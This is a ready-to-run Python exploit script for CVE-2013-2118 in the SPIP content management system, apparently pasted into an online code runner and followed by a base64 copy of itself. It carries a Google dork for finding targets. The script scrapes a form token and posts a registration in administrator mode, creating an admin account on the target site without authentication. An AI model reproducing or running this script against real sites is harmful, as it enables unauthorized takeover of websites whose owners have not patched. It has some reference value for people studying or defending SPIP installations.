# your code goes here
#!/usr/bin/env python
# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
# Date: 04/30/2014
# Flaw finder : Unknown
# Exploit Author: Gregory DRAPERI
# Email: gregory |dot| draperi |at| gmail |dot| com
# Google Dork : inurl="spip.php"
# Vendor Homepage: www.spip.net
# Software Link: http://f...content-available-to-author-only...p.org/spip/archives/
# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
# Tested on: Windows 7 - SPIP 2.2.21
# CVE : CVE-2013-2118
'''
---------------------------------------------------------------------------------------------------------
Software Description:
SPIP is a free software content management system
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.
 
'''
import urllib, urllib2
import cookielib
import sys
import re
 
def send_request(urlOpener, url, post_data=None):
   request = urllib2.Request(url)
   url = urlOpener.open(request, post_data)
   return url.read()
 
if len(sys.argv) < 4:
   print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
   exit()
 
base_url = sys.argv[1]
login = sys.argv[2]
mail = sys.argv[3]
 
cookiejar = cookielib.CookieJar()
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
 
 
formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
 
 
m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)
m = re.search("(?<=value=')[\w\+/=]*",m.group(0));
 
 
formulaire_data = {'var_ajax' : 'form',
                   'page' : 'identifiants',
                   'mode' : '0minirezo',
                   'formulaire_action' : 'inscription',
                   'formulaire_action_args' : m.group(0),
                   'nom_inscription' : login,
                   'mail_inscription' : mail,
                   'nobot' : ''
                  }
formulaire_data = urllib.urlencode(formulaire_data)
 
 
send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"
 
 
print "[+] You should receive an email with credentials soon :) "

IyB5b3VyIGNvZGUgZ29lcyBoZXJlCiMhL3Vzci9iaW4vZW52IHB5dGhvbgojIEV4cGxvaXQgVGl0bGU6IFNQSVAgLSBDTVMgPCAzLjAuOSAvIDIuMS4yMiAvIDIuMC4yMyAtIFByaXZpbGVnZSBlc2NhbGF0aW9uIHRvIGFkbWluaXN0cmF0b3IgYWNjb3VudCBmcm9tIG5vbiBhdXRoZW50aWNhdGVkIHVzZXIKIyBEYXRlOiAwNC8zMC8yMDE0CiMgRmxhdyBmaW5kZXIgOiBVbmtub3duCiMgRXhwbG9pdCBBdXRob3I6IEdyZWdvcnkgRFJBUEVSSQojIEVtYWlsOiBncmVnb3J5IHxkb3R8IGRyYXBlcmkgfGF0fCBnbWFpbCB8ZG90fCBjb20KIyBHb29nbGUgRG9yayA6IGludXJsPSJzcGlwLnBocCIKIyBWZW5kb3IgSG9tZXBhZ2U6IHd3dy5zcGlwLm5ldAojIFNvZnR3YXJlIExpbms6IGh0dHA6Ly9mLi4uY29udGVudC1hdmFpbGFibGUtdG8tYXV0aG9yLW9ubHkuLi5wLm9yZy9zcGlwL2FyY2hpdmVzLwojIFZlcnNpb246IFNQSVAgPCAzLjAuOSAvIDIuMS4yMiAvIDIuMC4yMwojIFRlc3RlZCBvbjogV2luZG93cyA3IC0gU1BJUCAyLjIuMjEKIyBDVkUgOiBDVkUtMjAxMy0yMTE4CicnJwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KU29mdHdhcmUgRGVzY3JpcHRpb246ClNQSVAgaXMgYSBmcmVlIHNvZnR3YXJlIGNvbnRlbnQgbWFuYWdlbWVudCBzeXN0ZW0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tClZ1bG5lcmFiaWxpdHkgRGV0YWlsczoKVGhpcyB2dWxuZXJhYmlsaXR5IGFsbG93cyByZW1vdGUgYXR0YWNrZXJzIHRvIGNyZWF0ZSBhbiBhZG1pbmlzdHJhdG9yIGFjY291bnQgb24gdGhlIENNUyB3aXRob3V0IGJlaW5nIGF1dGhlbnRpY2F0ZWQuClRvIGV4cGxvaXQgdGhlIGZsYXcsIGEgU01UUCBjb25maWd1cmF0aW9uIGhhcyB0byBiZSBjb25maWd1cmVkIG9uIFNQSVAgYmVjYXVzZSB0aGUgcGFzc3dvcmQgaXMgc2VudCBieSBtYWlsLgogCicnJwppbXBvcnQgdXJsbGliLCB1cmxsaWIyCmltcG9ydCBjb29raWVsaWIKaW1wb3J0IHN5cwppbXBvcnQgcmUKIApkZWYgc2VuZF9yZXF1ZXN0KHVybE9wZW5lciwgdXJsLCBwb3N0X2RhdGE9Tm9uZSk6CiAgIHJlcXVlc3QgPSB1cmxsaWIyLlJlcXVlc3QodXJsKQogICB1cmwgPSB1cmxPcGVuZXIub3BlbihyZXF1ZXN0LCBwb3N0X2RhdGEpCiAgIHJldHVybiB1cmwucmVhZCgpCiAKaWYgbGVuKHN5cy5hcmd2KSA8IDQ6CiAgIHByaW50ICJTUElQIDwgMy4wLjkgLyAyLjEuMjIgLyAyLjAuMjMgZXhwbG9pdCBieSBHcmVnb3J5IERSQVBFUklcblx0VXNhZ2U6IHB5dGhvbiBzY3JpcHQucHkgPFNQSVAgYmFzZV91cmw+IDxsb2dpbj4gPG1haWw+IgogICBleGl0KCkKIApiYXNlX3VybCA9IHN5cy5hcmd2WzFdCmxvZ2luID0gc3lzLmFyZ3ZbMl0KbWFpbCA9IHN5cy5hcmd2WzNdCiAKY29va2llamFyID0gY29va2llbGliLkNvb2tpZUphcigpCnVybE9wZW5lciA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHVybGxpYjIuSFRUUENvb2tpZVByb2Nlc3Nvcihjb29raWVqYXIpKQogCiAKZm9ybXVsYWlyZSA9IHNlbmRfcmVxdWVzdCh1cmxPcGVuZXIsIGJhc2VfdXJsKyIvc3BpcC5waHA/cGFnZT1pZGVudGlmaWFudHMmbW9kZT0wbWluaXJlem8iKQpwcmludCAiWytdIEZpcnN0IHJlcXVlc3Qgc2VuZGVkLi4uIgogCiAKbSA9IHJlLnNlYXJjaCgiPGlucHV0IG5hbWU9J2Zvcm11bGFpcmVfYWN0aW9uX2FyZ3MnIHR5cGU9J2hpZGRlbidcbltePl0qIiwgZm9ybXVsYWlyZSkKbSA9IHJlLnNlYXJjaCgiKD88PXZhbHVlPScpW1x3XCsvPV0qIixtLmdyb3VwKDApKTsKIAogCmZvcm11bGFpcmVfZGF0YSA9IHsndmFyX2FqYXgnIDogJ2Zvcm0nLAogICAgICAgICAgICAgICAgICAgJ3BhZ2UnIDogJ2lkZW50aWZpYW50cycsCiAgICAgICAgICAgICAgICAgICAnbW9kZScgOiAnMG1pbmlyZXpvJywKICAgICAgICAgICAgICAgICAgICdmb3JtdWxhaXJlX2FjdGlvbicgOiAnaW5zY3JpcHRpb24nLAogICAgICAgICAgICAgICAgICAgJ2Zvcm11bGFpcmVfYWN0aW9uX2FyZ3MnIDogbS5ncm91cCgwKSwKICAgICAgICAgICAgICAgICAgICdub21faW5zY3JpcHRpb24nIDogbG9naW4sCiAgICAgICAgICAgICAgICAgICAnbWFpbF9pbnNjcmlwdGlvbicgOiBtYWlsLAogICAgICAgICAgICAgICAgICAgJ25vYm90JyA6ICcnCiAgICAgICAgICAgICAgICAgIH0KZm9ybXVsYWlyZV9kYXRhID0gdXJsbGliLnVybGVuY29kZShmb3JtdWxhaXJlX2RhdGEpCiAKIApzZW5kX3JlcXVlc3QodXJsT3BlbmVyLCBiYXNlX3VybCsiL3NwaXAucGhwP3BhZ2U9aWRlbnRpZmlhbnRzJm1vZGU9MG1pbmlyZXpvIiwgZm9ybXVsYWlyZV9kYXRhKQpwcmludCAiWytdIFNlY29uZCByZXF1ZXN0IHNlbmRlZCIKIAogCnByaW50ICJbK10gWW91IHNob3VsZCByZWNlaXZlIGFuIGVtYWlsIHdpdGggY3JlZGVudGlhbHMgc29vbiA6KSAi